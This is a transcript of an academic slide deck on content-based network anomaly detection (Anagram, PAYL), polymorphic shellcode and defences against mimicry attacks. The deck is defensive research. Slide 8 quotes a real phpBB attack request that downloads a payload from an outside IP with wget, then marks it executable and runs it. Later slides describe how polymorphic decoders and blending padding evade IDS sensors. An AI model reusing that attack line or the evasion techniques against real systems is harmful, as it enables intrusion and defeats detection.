Contentbased Anomaly Detection presentation

About This Presentation

Transcript and Presenter's Notes

Title: Contentbased Anomaly Detection

1
Content-based Anomaly Detection

Salvatore J. Stolfo
Columbia University
Department of Computer Science
IDS Lab

December 2007
2
Colaborators

Gabriela Cretu
Angelos Keromytis
Mike Locasto
Janak Parekh
Angelos Stavrou
Yingbo Song
Ke Wang

3
Agenda

Anagram payload anomaly detection algorithm (Post
Payl)
The Polymorphic Threat
Countering Adversarial training/mimicry attacks
Randomized modeling/testing

4
Conjecture and Goal

Detect Zero-Day Exploits via Content Analysis
Worms propagation detectable via flow
statistics (except perhaps slow worms)
Targeted Attacks (sophisticated, stealthy, no
loud and obvious propagation/behavior)
True Zero-day will manifest as never before seen
data
Learn typical/normal data, detect abnormal data
Desiderata Accuracy, efficiency, scale,
counter-evasion (resist training and
mimicry attack)
Minimize false negatives
Minimize resource consumption too (Think MANETS)

5
Goal

We seek to model normal payload
Ingress from external sources to servers
Egress from servers to external sources
Egress from clients within a LAN
We model content flows that are cleartext
Learn typical/normal data to detect abnormal
data need not be perfect
Whitelisted data deemed normal passes
Blacklisted data filtered
Suspicious data deemed abnormal, subjected to
deeper analysis, eg., emulation
Overall Goal for system
Dont negatively impact operations
maintain throughput, minimize latency, minimize
cost

6
(No Transcript)
7
Previous work PAYL

Models length conditioned character frequency
distribution (1-gram) of normal traffic
Testing Mahalanobis distance of the test packet
against the model
Pro
Simple, fast, memory efficient
Con
Cannot capture attacks displaying normal byte
distribution
Easily fooled by mimicry attacks with proper
padding

8
Example phpBB forum attack
GET /modules/Forums/admin/admin_styles.php?phpbb_r
oot_pathhttp//81.174.26.111/cmd.gif?cmdcd20/t
mpwget20216.15.209.4/crimanchmod2074420criman
./crimanecho20YYYecho..HTTP/1.1.Host.128.59.
16.26.User-Agent.Mozilla/4.0.(compatible.MSIE.6.
0.Windows.NT.5.1)..

Relatively normal byte distribution, so PAYL
misses it
What we need capture order dependence of byte
sequences
PAYL Frequency-based modeling of n-grams (ngt1) is
infeasible here since feature space is huge
requiring long training time
Anagram higher order n-grams (ngt1) modeling is
possible

9
Why n-grams?

Easily extracted feature from packet payload
flows
Language/protocol independent

10
Overview of Anagram

Binary-base high order n-gram modeling
Store all the distinct n-grams appearing in the
normal training data
During test, compute the percentage of never-seen
distinct n-grams out of the total n-grams in a
packet
Semi-supervised
Normal traffic is modeled
Prior known malicious traffic is modeled Snort
Rules, captured malcode
Model is space-efficient by using Bloom filters
with gzip
Normal 7-gram BF 16 MB -gt 1.2MB after gzip
Malicious mixed 2-9-gram BF 8 MB -gt 0.8MB
after gzip
Accurate anomalous payload detection, even
carefully crafted attacks/mimicry attacks
Fast correlation of multiple alerts while
preserving privacy by using Bloom filter
representation of anomalous payload
Generate robust attack signatures

11
Bloom filter

A Bloom filter (BF) is a one-way data structure
that supports insert and verify operations, yet
is fast and space-efficient
Represented as a bit vector bit b is set if
hi(e) b, where hi is a hash function and e is
the element in question
No false negatives, although false positives are
possible in a saturated BF via hash collisions
use multiple hash functions for robustness
Each n-gram is a candidate element to be inserted
or verified in the BF
Bloom filters are also privacy-preserving, since
n-grams cannot be extracted from the resulting
bit vector
Exhaustive dictionary attack may reveal grams
Frequency of grams not available, reconstruction
very hard

12
(No Transcript)
13
Overview of Anagram(Training BF models)
14
Overview of Anagram(Detection BF represents
anomalous packet data)
15
False positive rate (with 100 detection rate)
with different training time and n of n-grams
Normal traffic real web traffic collected of two
CUCS web servers Test worms CR, CRII, WebDAV,
Mirela, phpBB forum attack, nsiislog.dll buffer
overflow(MS03-022)

Low False positive rate PER PACKET (better per
flow)
No significant gain after 4 days training
Higher order n-grams needs longer training time
to build good model
3-grams are not long enough to distinguish
malicious byte sequences from normal ones

16
Anagram semi-supervised learning

Binary-based approach is simple and efficient,
but too sensitive to noisy data
Avoid high entropy fields
Pre-compute a bad content model to discriminate
using snort rules and collection of worm samples.
This model should match few normal packets,
while able to identify malicious traffic (often,
new exploits reuse portions of old exploits)
The model contains the distinct n-grams appearing
in malcode collections not also in normal traffic
Use a small, clean dataset to exclude the normal
n-grams appearing in the snort rules and virus.

17
Use of bad content model

Training ignore possible malicious n-grams
Packets with a max number of N-grams matching the
bad content model are ignored
Packets with high matching score (gt5) ignored,
since new attacks might reuse old exploit code.
Ignoring few packets is harmless for training
Testing scoring separates malicious from normal
If a never-seen n-gram also appears in the bad
content model, give a higher weight factor t for
it. (t5 in our experiment

18
The false positive rate (with 100 detection
rate) for different n-grams, under both normal
and semi-supervised training per packet rate
19
Yesterdays Newsliterally!
20
Can we get ahead of the enemy?

Polymorphism complicates everything and
challenges assumptions
So, how well do current engines do?
Metrics to evaluate
Spectral imaging to visualize
Can we pre-compute malcode before the enemy and
pre-model these yet to be seen in the wild?
GA Search to generate decoders

21
Analysis of the Polymorphic Threat

Goals
Analyze the effectiveness of current polymorphism
techniques employed by Shellcoders to evade
signature-based IDS
Develop metrics to quantify the strength of
modern polymorphic engines and use it to analyze
existing engines being used in the wild
Explore the threat for combining polymorphism
with other evasion techniques such as blending
attacks
Explore future theoretical limits for shellcode
polymorphism

22
Why use Polymorphism?

Easy to use obfuscation technique to complicate
detection
Basic Shellcode form NOPPAYLOADRETADDR
Basic cipher based polymorphism
1 Cipher/encode payload
2 Prepend a decoder in front.
3 The shellcode will de-crypt itself as it
executes!
Now only the decoder needs to be polymorphic.
Polymorphic Shellcode
NOPDECODERCIPHER_TEXTRETADDR

23
Polymorphic Shellcode

Sample decoder from the open source CLET engine.
Only 35 bytes are needed to generate five layers
of cipher operations.

How can we measure the effectiveness of these
polymorphic techniques? Modeling encrypted
portion is impossible. Need a metric to measure
decoder variants.
24
Strength Metrics for Polymorphism

Variation strength estimates the spread over
n-space
(average of the square root of the covariance
matrix eigenvalues that span the generated space
of decoders)

Propagation strength estimates how different
each decoder appears
(measures the expected distance between any two
decoders)
Overall strength is the product of the two
metrics. Some engines generate many decoders by
shifting the order of operations. In this case,
variation strength might be high but the
propagation strength would be low.

25
Strength Metrics

To evaluate the strength of a polymorphic
engine we take a shellcode sample and use it to
generate 50,000 decoders. Extract the
decoders and then use the metrics we presented.

Decoder polymorphism strengths for various
engines using our metric. We are also presenting
the scores for random strings with range 128 and
range 256
26
Strength Metrics

Another innovation spectral images.
Generate decoder samples, stack them together
and display the stacked samples as an image. The
invariants appears as stripes.

27
Exemplar Polymorphic Blending Engine
Combine CLET, ADMmutate, add our own blending
engine. Clet ciphers the shellcode. Leaves a
blending section open, execution doesnt reach
there.

ADMmutate hides CLETs NOP sled
Decoder and exploit section is randomized
Return address section is obfuscated with a
blending aimed to some target distribution

Each row of pixels represents a fully working
shellcode nopdecodercipher-textopen-blend
retaddr
28
Polymorphic Blending Potential

The blending section sits outside the
shellcodes inner loop and is never reached
during execution. Attackers can fill this area
with bytes sampled from the same distribution as
the target network to bypass statistical IDS
sensors.
The byte distribution of a sample target
network.
Mahalanobis distance of the shellcode byte
distribution to the target distribution as we
enlarge the blending section.

29
Is N-space Saturated?

Theoretical Limits Of Polymorphism?
GA-search shows N-space Is Likely Saturated With
X86 Code That Behaves Like Polymorphic
Decoders.
Magnitude Of Decoders , N Is The
Length Of The Decoder(30 Bytes). Number Of
Atoms In The Universe Is Only .

30
Conclusion on Polymorphism

The metrics provide a means to quantify the
strength of polymorphic engines relative to each
other
Very sophisticated polymorphism techniques are
already implemented and are a real threat
Experimental results show that there is virtually
no limit to the ways decoders can be written
Signature based methods arent likely to work in
the long term
The only hope?
Either instrument ALL systems with dynamic
host-based tests
Or counter these evasion techniques with better
content AD sensor
We do not yet know whether another modelling
technique can effectively discriminate well
enough between malicious or benign content

31
Counter Evasion

Blind the attacker from critical information
using randomization techniques
We assume they know the algorithm and perhaps can
know an estimate of the target distribution from
some period of time, but they may not know the
actual model used by a content AD sensor!
The enemy needs to know
Where to pad
Hide the packet locations where models are tested
What to pad
Hide the normal distribution
Length-conditioned model
Eg., Multiple Bloom filters per model
Hide the gram size
Random choice of n
When to pad
Re-compute models on a random schedule
Eg., Time-bounded Bloom filter models

32
Randomization against mimicry attacks

The general idea of payload-based mimicry attacks
is by crafting small pieces of exploit code with
a large amount of normal padding to make the
whole packet look normal wrt some particular
model
If we randomly choose the payload portion for
modeling/testing, the attacker would not know
precisely which byte positions it may have to pad
to appear normal harder to hide the exploit
code!
This is a general technique can be used for both
PAYL and Anagram, or any other payload anomaly
detector.
For Anagram, additional randomization, keep
n-gram size a secret!

33
Randomized Modeling (1)

Separate the whole packet/session randomly into
several (possibly interleaved) substrings or
subsequences S1, S2, ..SN, and build one model
for each of these randomly chosen portions
Test payload is divided accordingly

34
Randomization techniques (2)

Randomized Testing Simpler strategy that does
not incur substantial overhead
Build one model for whole packet, randomize
tested portions
Separate the whole packet randomly into several
(possibly interleaved) partitions S1, S2, ..SN,
Score each randomly chosen partition separately

35
(No Transcript)
36
Randomization techniques (3)

Fine grained modeling of normal payload
Condition models on packet length or randomly
chosen packet portions
Could incur large memory costs
Cluster adjacent models to reduce space for
detector

37
Example of clustering models

Original models

Clustered models

38
Feedback-based learning with shadow servers
(correlation with server responses)

Training attacks attacker sends malicious data
during training time to poison the model.
Bad content model cannot guarantee 100 detection
The most reliable way is using the feedback of
some host-based shadow server to supervise the
training
Also useful for adaptive learning to accommodate
concept shifting
Anagram can be used as a first-line classifier to
amortize the expensive cost of the shadow server
Only small percentage of the all traffic is sent
to shadow server, instead of all
The feedback of shadow server can be improve the
accuracy of Anagram

39
(No Transcript)
40
Minimize Latency
False Positive Rate is not the only
metric Sensor speed crucial for all
traffic Accuracy impacts latency Protected
system with shadow incurs latency True
Positives are filtered No latency for True
Negatives Some latency for False Positives L
operational latency per request O shadow
server overhead (eg., 20) F false positive
rate of sensor L ((1-F)L) (LOF) Target L
L at 1, if O20, F can be as high as 10
41
Thank you!
42
With huge feature space of high order n-grams,
when is the model well trained? How likely we
will see new normal n-grams?
The likelihood of seeing new n-grams, which is
the percentage of the new distinct n-grams out of
every 10,000 packets when we train up to 500
hours of traffic data
43
Distribution of bad content matching scores for
normal packets (left) and attack packets
(right). The matching score is the percentage
of the n-grams of a packet that match the bad
content model
44
Cross-site collaboration Content alert sharing

Principles
Each site has a distinct content flow
Diversity via content (not system or software)
Higher standard to confound mimicry attack
Exploit writers/attackers have to learn the
distinct content traffic patterns of many
different sites
If multiple sites see the same/similar content
alerts, its highly likely to be a true
worm/targeted outbreak
Each site corroborates its evidence
Reduces false positives by creating white lists
of those alerts that cannot be correlated

45
Anagram privacy preserving cross-site
collaboration

The anomalous n-grams of suspicious payload are
stored in a Bloom filter, and exchanged among
sites
By checking the n-grams of local alerts against
the Bloom filter alert, its easy to tell how
similar the alerts are to each other
The common malicious n-grams can be used for
general signature generation, even for
polymorphic worms
Privacy preserving with no loss of accuracy

46
Counter Evasion Collaborative Sharing of
Suspicious Content (DNAD-2/AEOLOS) PI Sal Stolfo
Columbia University Tel. (212) 939-7080, E-Mail
sal_at_cs.columbia.edu

Objective
Validate suspect anomalous content detected
locally
as a true new attack exploit
- Identify anomalous content indicative of
attack, or botnet
command and control or malware embedded in
docs
- Resist Mimicry and Training Attacks
- Cross site validation to detect True
Positives
- Preserve privacy of shared data among sites
Contract Army Research Office, No. DA
W911NF-04-1-0442
Budget FY05-07 NSA MIPR/ARO 420K

Continuous, semi-supervised learning of new
attack exploits cross site validation

Accomplishments
Developed the new Anagram sensor shown to resist
mimicry attack
Developed new quantifiable, privacy preservation
techniques for cross-domain sharing
l Collaborating with NSA and other organizations
to test
Challenges
l Cross-site collaborators and managing privacy
policies
Develop interchange and interfaces for content
submission

Scientific/Technical Approach
Anagram anomaly detector based upon randomized
models countering mimicry attacks
l Use privacy-preserving one-way Bloom filter
data
structure to share anomalous content among
sites and
correlate to filter out false positives
l Robust signatures extracted from Bloom filters

47
DNAD

Goal develop a new paradigm for intrusion alert
information sharing while maintaining compliance
with information disclosure restrictions and
privacy policies
Support rich, varied types of intrusion alerts
and models/profiles of behavior
Critical to get accurate global view on threats
rapidly to enable defense mechanisms
IRB/legal roadblocks prevented wide scale
deployment

48
DNAD corroboration model

Transmit privacy-preserving transforms of IDS
alerts, extend beyond headers to network traffic
payloads and other models
Build a robust, temporal-enabled corroboration
infrastructure able to match alerts (and
fragments of alerts) across sites
Use of compact Bloom filters and n-gram analysis
for fast, robust encoding
Automatic suspect signature generation

49
A graphical viewthink P2P
50
What if we exchange models too?
Models
51
Training data sanitization

Motivation
Focus on zero-day attacks, but
Anomaly detection performance can be improved by
using clean training data
Attacks appearing in training data can
deteriorate detection performance
False positives create excessive noise
Method
Use a large set of (distributed and diverse)
training data of network packet payloads from
multiple domains
Divide data into multiple blocks
Build models for each block and exchange models
(privacy-preservation)
Test all models against a local smaller dataset
Voting algorithms( bagging predictors ) to
determine false false positives and true
positives
Clean data based on previous step

Write a Comment

User Comments (0)

About PowerShow.com

Contentbased Anomaly Detection PowerPoint PPT Presentation